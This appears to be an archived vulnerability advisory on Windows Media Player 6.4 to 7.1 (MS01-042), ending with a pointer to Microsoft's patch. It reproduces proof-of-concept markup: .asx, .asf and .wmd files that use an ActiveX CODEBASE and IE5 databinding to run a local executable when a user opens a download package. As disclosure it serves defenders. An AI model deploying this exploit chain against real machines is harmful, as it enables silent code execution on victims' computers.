COMMAND

    Media Player

SYSTEMS AFFECTED

    Windows Media Player 6.4, 7, and 7.1

PROBLEM

    Following  is  based  on  a  Microsoft Security Bulletin MS01-042.
    Windows  Media  Player  provides  support  for  audio  and   video
    streaming.  Streaming  media channels can  be configured by  using
    Windows Media Station  (.NSC) files.   An unchecked buffer  exists
    in the functionality used to process Windows Media Station  files.
    This unchecked buffer could  potentially allow an attacker  to run
    code of his choice on the  machine of another user.  The  attacker
    could either send a specially  malformed file to another user  and
    entice her to run or preview it,  or he could host such a file  on
    a web site  and cause it  to launch automatically  whenever a user
    visited the site.  The code  could take any action on the  machine
    that the legitimate user himself could take.

    Customers  who  have  applied  the  Outlook E-mail Security Update
    (OESU) for Outlook 2000 or  are running Outlook XP, which  has the
    OESU functionality built-in,  are automatically protected  against
    HTML e-mail based attempts to exploit this vulnerability.

    For others not in the above categories, the attacker would have to
    entice the potential victim to visit a web site he controlled,  or
    to open an HTML e-mail he had sent.

    The attacker would need to know the specific operating system that
    the user was running in order to tailor the attack code  properly;
    if the attacker made an incorrect guess about the user's operating
    system platform, the attack  would crash the user's  Windows Media
    Player session, but not run code of the attacker's choice.

    Windows Media  Player executing  files on  the target  computer as
    follows.

    1. Create an *.asx meta file as follows:

        <ASX><Entry><ref HREF=''/></ASX>
        <IFRAME SRC='about:<body><html><OBJECT CLASSID="CLSID:10000000-0000-0000-0000-000000000000" CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME>
        <!-- 27.07.01 http://www.malware.com -->

    2. Create an *.asf file with URL flip as follows:

        about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0
        CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="file://C:\My Documents\My Music\Virtual Albums\malware\malware.asx"><PARAM NAME="UseHeader" VALUE="true"></OBJECT><div datasrc=#Content datafld="<ASX><Entry><ref HREF=''/></ASX>" dataformatas="HTML" style="width: 100%; height: 60%;"></div>

    3. Create a *.wmd file comprising 1 and 2 above.

    What happens?  Ordinarily the Windows Media Download Package  file
    (*.wmd) creates a folder with the given name of the *.wmd file  --
    e.g.  malware.wmd  will  create  a  folder  called  malware in the
    default location  for so-called  "Virtual Music"  -- specifically:
    My  Documents\My  Music\Virtual  Albums\malware, security measures
    currently incorporated in  the extraction of  the contents of  the
    *.wmd do a  reasonably good job  of ensuring that  files contained
    within the Download Package, are in fact valid files.

    A reasonably good job.

    We find that the bare minimum for the *.asx meta file must include
    the following:

        <ASX><Entry><ref HREF=''/></ASX>

    with these  tags the  Media Player  will indeed  extract the *.asx
    file into our known folder.  So how do we make use of that?

    Databinding.

    We  find  that  we  can  parse  html using the databinding control
    included in IE5.  And we  do it like so:  the  databinding control
    requires a header to match what it  is to write as html.  What  we
    do, quite  brilliantly actually,  is use  the *.asx  header as our
    header for the databinding control:

        *.asx - <ASX><Entry><ref HREF=''/></ASX>

    databinding control:

        datafld="<ASX><Entry><ref HREF=''/></ASX>"

    The  Windows  Media  Package  file  (malware.wmd) is automatically
    opened from  web or  news or  mail, it  automatically creates  the
    malware folder  in the  so-called 'Virtual  Music" directory.   It
    automatically extracts the malware.asx  meta file, which is  valid
    but includes our Active X component as above, and it extracts  our
    malware.asf file  which includes  our URL  flip.   The URL flip is
    called once the malware.asf starts playing, it creates an  "about"
    window from within the malware folder, the "about" window includes
    our  databinding  control  which  points  to the malware.asx which
    rendered as *.html because the datafld header *IS* the *.asx  meta
    tag!

    And that all in turn executes! our file on the target computer.

    1. The  machine that  this is  all on  is now  dead thanks to your
       module MSDXM.OCX which will  require a reformat.   Nevertheless
       a fully functional example  has been thoroughly tested  in "the
       field"
    2. The "free" Advanced Script Indexer that comes with the  Windows
       Media  7  Resource  Kit  allows  us  to include in the URL flip
       whatever we like.
    3. The  path  to  the  so-called  "Virtual  Music"  directory   is
       hard-coded in the above.  The possibility of not having to know
       the location is good  because everything is opened  from within
       the same folder created  by the Windows Media  Download package
       i.e.  possibly  through a "skin"  file, or some  other entry in
       the *.asx such as  an <event> parameter coupled  with scripting
       in the *.asf or *.wmz file(s), relative paths should work.
    4. When it suits us,  we'll recompile the working example  if none
       of the above is clear.
    5. It  took 10  days to  conceive, craft  and construct,  of which
       about 5 days were  spent crashing and scandisk"ing"  at minimum
       4 times per day. Win98.  Very unstable.

SOLUTION

    A patch is available to  fix this vulnerability.  Please  read the
    Security Bulletin:

        http://www.microsoft.com/technet/security/bulletin/ms01-042.asp

    for information on obtaining this patch.